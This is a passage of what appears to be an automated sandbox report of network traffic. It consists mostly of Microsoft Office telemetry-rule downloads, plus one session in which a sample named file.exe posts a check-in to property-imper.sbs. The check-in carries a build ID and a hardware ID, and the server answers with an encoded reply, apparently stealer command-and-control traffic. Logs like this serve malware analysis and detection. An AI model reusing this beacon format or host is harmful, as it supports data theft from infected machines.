                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
                                                                                                                                                                                  ETag: "0x8DC582BB2D62837"
                                                                                                                                                                                  x-ms-request-id: ed66cbfc-201e-0051-7e30-3c7340000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T185242Z-178bfbc474bgvl54hC1NYCsfuw00000004y0000000001vps
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 18:52:42 UTC400INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4c 6c 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120643" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <SR T="2" R="^([Ll][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S T="


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                  49192.168.2.749754104.21.33.1164436908C:\Users\user\Desktop\file.exe
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 18:52:42 UTC266OUTPOST /api HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                  Content-Length: 88
                                                                                                                                                                                  Host: property-imper.sbs
                                                                                                                                                                                  2024-11-23 18:52:42 UTC88OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 26 6a 3d 26 68 77 69 64 3d 30 43 34 33 42 39 38 37 42 32 38 45 37 34 32 44 44 37 43 42 42 44 36 44 46 32 38 44 33 37 33 32
                                                                                                                                                                                  Data Ascii: act=get_message&ver=4.0&lid=LOGS11--LiveTraffic&j=&hwid=0C43B987B28E742DD7CBBD6DF28D3732
                                                                                                                                                                                  2024-11-23 18:52:43 UTC1018INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 18:52:42 GMT
                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Set-Cookie: PHPSESSID=lpcfqkdgc2sj60v59tg3lssk2g; expires=Wed, 19-Mar-2025 12:39:21 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                                  vary: accept-encoding
                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sDKVyRZoubdpfWxdzy4%2BNmjmfkg23riqa0hpow6Z6uoc%2BwDEjvOgDU1jfG6dU%2BJwWMHgn6FyqZHp4ZQGTcNfvIuPZn5%2Bz5MOtn00%2BoTFDkPohd69rujQUsuBL6zeV3D6bq2rZO4%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                  CF-RAY: 8e735b9e284843c8-EWR
                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=12568&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2844&recv_bytes=990&delivery_rate=1620421&cwnd=191&unsent_bytes=0&cid=1ca47e00ded7d2da&ts=770&x=0"
                                                                                                                                                                                  2024-11-23 18:52:43 UTC214INData Raw: 64 30 0d 0a 2f 33 65 65 71 67 39 2b 6d 2b 76 53 79 37 74 39 51 31 4a 72 52 71 75 47 4c 35 6a 35 4b 77 4e 45 33 34 34 65 38 30 41 75 63 34 75 6b 44 4c 7a 66 4c 55 53 35 67 36 61 2f 79 30 63 66 66 54 64 70 6d 72 34 61 74 73 73 61 4e 6d 72 75 76 79 33 64 63 52 67 76 70 4a 41 52 2b 50 59 67 47 76 36 4e 2f 4b 37 44 47 47 46 2b 53 53 44 66 70 42 57 6f 31 51 6c 6d 5a 75 57 2f 59 39 38 37 44 41 61 70 78 56 58 32 33 6e 73 4f 6f 62 66 39 6c 35 52 4d 65 32 64 46 64 4a 71 7a 41 61 6e 49 47 43 31 31 36 64 49 78 67 44 52 4c 45 75 61 6a 57 4f 7a 4c 59 52 72 30 68 76 79 75 77 78 68 68 66 6b 6b 67 33 36 51 56 71 4e 55 4a 5a 6d 62 6c 76 6d 4f 75 0d 0a
                                                                                                                                                                                  Data Ascii: d0/3eeqg9+m+vSy7t9Q1JrRquGL5j5KwNE344e80Auc4ukDLzfLUS5g6a/y0cffTdpmr4atssaNmruvy3dcRgvpJAR+PYgGv6N/K7DGGF+SSDfpBWo1QlmZuW/Y987DAapxVX23nsOobf9l5RMe2dFdJqzAanIGC116dIxgDRLEuajWOzLYRr0hvyuwxhhfkkg36QVqNUJZmblvmOu
                                                                                                                                                                                  2024-11-23 18:52:43 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  50192.168.2.74975513.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 18:52:43 UTC192OUTGET /rules/rule120645v0s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 18:52:43 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 18:52:43 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 425
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT
                                                                                                                                                                                  ETag: "0x8DC582BBA25094F"
                                                                                                                                                                                  x-ms-request-id: 9aadc8db-201e-000c-3931-3c79c4000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T185243Z-178bfbc474bpscmfhC1NYCfc2c00000003dg00000000d85f
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 18:52:43 UTC425INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 4d 6d 5d 5b 41 61 5d 5b 5a 7a 5d 5b 4f 6f 5d 5b 4e 6e 5d 20 5b 45 65 5d 5b 43 63 5d 32 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120645" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <SR T="2" R="([Aa][Mm][Aa][Zz][Oo][Nn] [Ee][Cc]2)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I=


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  51192.168.2.74975613.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 18:52:43 UTC192OUTGET /rules/rule120646v0s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 18:52:43 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 18:52:43 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 475
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
                                                                                                                                                                                  ETag: "0x8DC582BB2BE84FD"
                                                                                                                                                                                  x-ms-request-id: 8b9ec706-101e-000b-544c-3c5e5c000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T185243Z-15b8b599d88tmlzshC1TEB4xpn000000036000000000e0k3
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 18:52:43 UTC475INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120646" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  52192.168.2.74975713.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 18:52:43 UTC192OUTGET /rules/rule120647v0s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 18:52:43 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 18:52:43 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 448
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                                                                                                                  ETag: "0x8DC582BB389F49B"
                                                                                                                                                                                  x-ms-request-id: 008bef3b-f01e-001f-677c-3b5dc8000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T185243Z-174c587ffdf59vqchC1TEByk6800000003gg000000007q7q
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 18:52:43 UTC448INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 50 70 5d 5b 41 61 5d 5b 43 63 5d 5b 48 68 5d 5b 45 65 5d 20 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120647" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <SR T="2" R="([Aa][Pp][Aa][Cc][Hh][Ee] [Ss][Oo][Ff][Tt][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR>


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  53192.168.2.74975813.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 18:52:44 UTC192OUTGET /rules/rule120648v0s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 18:52:44 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 18:52:44 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 491
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                                  ETag: "0x8DC582B98B88612"
                                                                                                                                                                                  x-ms-request-id: af6ae163-c01e-0082-6735-3caf72000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T185244Z-178bfbc474bmqmgjhC1NYCy16c00000004y0000000009t64
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 18:52:44 UTC491INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120648" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  54192.168.2.74975913.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 18:52:44 UTC192OUTGET /rules/rule120649v0s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 18:52:45 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 18:52:44 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 416
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:26:21 GMT
                                                                                                                                                                                  ETag: "0x8DC582BAEA4B445"
                                                                                                                                                                                  x-ms-request-id: f9d2b1a4-b01e-003d-337e-3bd32c000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T185244Z-174c587ffdfx984chC1TEB676g00000003bg000000008cnu
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 18:52:45 UTC416INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 46 66 5d 5b 45 65 5d 5b 44 64 5d 5b 4f 6f 5d 5b 52 72 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120649" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <SR T="2" R="^([Ff][Ee][Dd][Oo][Rr][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  55192.168.2.74976113.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 18:52:45 UTC192OUTGET /rules/rule120650v0s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 18:52:46 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 18:52:45 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 479
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                                  ETag: "0x8DC582B989EE75B"
                                                                                                                                                                                  x-ms-request-id: b70f59bb-c01e-0079-1f91-3de51a000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T185245Z-178bfbc474bscnbchC1NYCe7eg00000005300000000038za
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  X-Cache-Info: L1_T2
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 18:52:46 UTC479INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120650" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  56192.168.2.74976313.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 18:52:45 UTC192OUTGET /rules/rule120652v0s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 18:52:46 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 18:52:46 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 471
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
                                                                                                                                                                                  ETag: "0x8DC582B97E6FCDD"
                                                                                                                                                                                  x-ms-request-id: 79a9dcb6-201e-003c-1c7b-3b30f9000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T185246Z-178bfbc474bv7whqhC1NYC1fg400000004w0000000009m3q
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 18:52:46 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120652" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  57192.168.2.74976213.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 18:52:45 UTC192OUTGET /rules/rule120651v0s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 18:52:46 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 18:52:46 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 415
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
                                                                                                                                                                                  ETag: "0x8DC582BA80D96A1"
                                                                                                                                                                                  x-ms-request-id: 77e83d57-401e-0016-5857-3c53e0000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T185246Z-15b8b599d88cn5thhC1TEBqxkn000000038g0000000069fe
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
